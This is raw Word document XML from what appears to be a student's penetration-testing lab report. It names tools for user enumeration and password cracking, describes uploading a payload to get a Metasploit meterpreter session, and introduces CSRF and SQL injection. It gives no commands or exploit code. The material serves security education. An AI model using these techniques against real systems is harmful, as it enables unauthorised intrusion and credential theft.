                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>than</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>the</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">above tools what are the tools </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">you </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>have discovered/ observed/ used/ tried? List them and record their usage, pros and cons comparing to the above listed and above used tools in this</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-1"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>lab.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5882EF4B" w14:textId="3222F673" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="02556A54" w14:textId="0AED2B54" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Could not get the server working but I know the tools to use, below is a list of them.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47A3DE34" w14:textId="74903C91" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5C70720C" w14:textId="23D32033" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Enumerate users- NBTscan, DumpSec, NBTDump</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7587197E" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5FE1B30F" w14:textId="1B91E1CD" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Crack password- John the ripper, Brutus, Medusa</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46902B1F" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="01449139" w14:textId="1C4C6088" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>File upload – uploading a script(payload) then executing Metasploit to gain a meterpreter session.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="391FFF4C" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="50092B03" w14:textId="0A633DF4" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Remote command execution vulnerability </w:t>
                            </w:r>
                            <w:r w:rsidR="00F83F1E">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>–</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00F83F1E">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>not sure with this one, I think its similar to the file upload. Upload a file to get a remote command execution such as a meterpreter.</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B3E8A01" id="Text Box 7" o:spid="_x0000_s1046" type="#_x0000_t202" style="position:absolute;margin-left:88.55pt;margin-top:12.5pt;width:436.2pt;height:289.8pt;z-index:-1570969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1+AwIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9tu2zAMfR+wfxD0vjhJ27Qz4hRZgg4D&#10;ugvQ7gNkWbaFyaJGKbGzrx8lx1nRvQ2DAYHi5YjnkF7fD51hR4Vegy34YjbnTFkJlbZNwb8/P7y7&#10;48wHYSthwKqCn5Tn95u3b9a9y9USWjCVQkYg1ue9K3gbgsuzzMtWdcLPwClLwRqwE4Gu2GQVip7Q&#10;O5Mt5/NV1gNWDkEq78m7H4N8k/DrWsnwta69CswUnHoL6cR0lvHMNmuRNyhcq+W5DfEPXXRCW3r0&#10;ArUXQbAD6r+gOi0RPNRhJqHLoK61VIkDsVnMX7F5aoVTiQuJ491FJv//YOWX4zdkuir4csmZFR3N&#10;6FkNgX2Agd1GeXrnc8p6cpQXBnLTmBNV7x5B/vDMwq4VtlFbROhbJSpqbxErsxelI46PIGX/GSp6&#10;RhwCJKChxi5qR2owQqcxnS6jia1Ict7cXL2/vaaQpNjV6m5+vUrDy0Q+lTv04aOCjkWj4EizT/Di&#10;+OhDbEfkU0p8zYPR1YM2Jl2wKXcG2VHQnuy38UsMXqUZG5MtxLIRMXoSz0htJBmGckiKLlaTfiVU&#10;J2KOMO4f/S9ktIC/OOtp9wrufx4EKs7MJ0vqxUWdDJyMcjKElVRa8MDZaO7CuNAHh7ppCXmcj4Ut&#10;KVzrxD2OYuzi3C/tU5LkvPtxYV/eU9afP3TzGwAA//8DAFBLAwQUAAYACAAAACEAUDJDTuAAAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VIXBC1U7VpCXEqBOKGBJRWgpsbb5Oo&#10;sR1stw5/z/YEx9GMZt6Uq9H07IQ+dM5KyCYCGNra6c42EjYfz7dLYCEqq1XvLEr4wQCr6vKiVIV2&#10;yb7jaR0bRiU2FEpCG+NQcB7qFo0KEzegJW/vvFGRpG+49ipRuen5VIicG9VZWmjVgI8t1of10dDu&#10;V8q+bw6v2+XwlNDjyxv/3Ccpr6/Gh3tgEcf4F4YzPqFDRUw7d7Q6sJ70YpFRVMJ0Tp/OATG7mwPb&#10;ScjFLAdelfz/h+oXAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAHwP9fgMCAADpAwAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAUDJDTuAAAAALAQAA&#10;DwAAAAAAAAAAAAAAAABdBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAGoFAAAAAA==&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="77C08D26" w14:textId="5C5F8BCC" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>reflection</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-14"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>here.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-10"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>As</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>a</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>cybersecurity</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-17"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>analyst,</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>other</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>than</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">above tools what are the tools </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">you </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>have discovered/ observed/ used/ tried? List them and record their usage, pros and cons comparing to the above listed and above used tools in this</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-1"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>lab.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5882EF4B" w14:textId="3222F673" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="02556A54" w14:textId="0AED2B54" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Could not get the server working but I know the tools to use, below is a list of them.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47A3DE34" w14:textId="74903C91" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5C70720C" w14:textId="23D32033" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Enumerate users- NBTscan, DumpSec, NBTDump</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7587197E" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5FE1B30F" w14:textId="1B91E1CD" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Crack password- John the ripper, Brutus, Medusa</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46902B1F" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="01449139" w14:textId="1C4C6088" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>File upload – uploading a script(payload) then executing Metasploit to gain a meterpreter session.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="391FFF4C" w14:textId="77777777" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="50092B03" w14:textId="0A633DF4" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Remote command execution vulnerability </w:t>
                      </w:r>
                      <w:r w:rsidR="00F83F1E">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>–</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00F83F1E">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>not sure with this one, I think its similar to the file upload. Upload a file to get a remote command execution such as a meterpreter.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D179586" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCFEEFF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="82"/>
        <w:ind w:left="4980"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010AB1D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1438"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: In our previous task, we used CSFR (Cross-site request forgery), to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send requests to vulnerable website from a user’s web browser via malicious web page to enable an attack. Let’s move ahead and attempt a SQL – Injection attacks now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8168C1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419C7933" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection is targeted on SQL Databases as its name suggests. Not all the SQL Databases,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>codes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>execute database queries and collect information, modify information and add malicious code to the</w:t>
      </w:r>
      <w:r>
        <w:t>m.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE25F23" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496891BD" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="840" w:right="1435" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>understand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>here:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>the database, but in the website. The responsible person here is not the db management, but the website/ application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
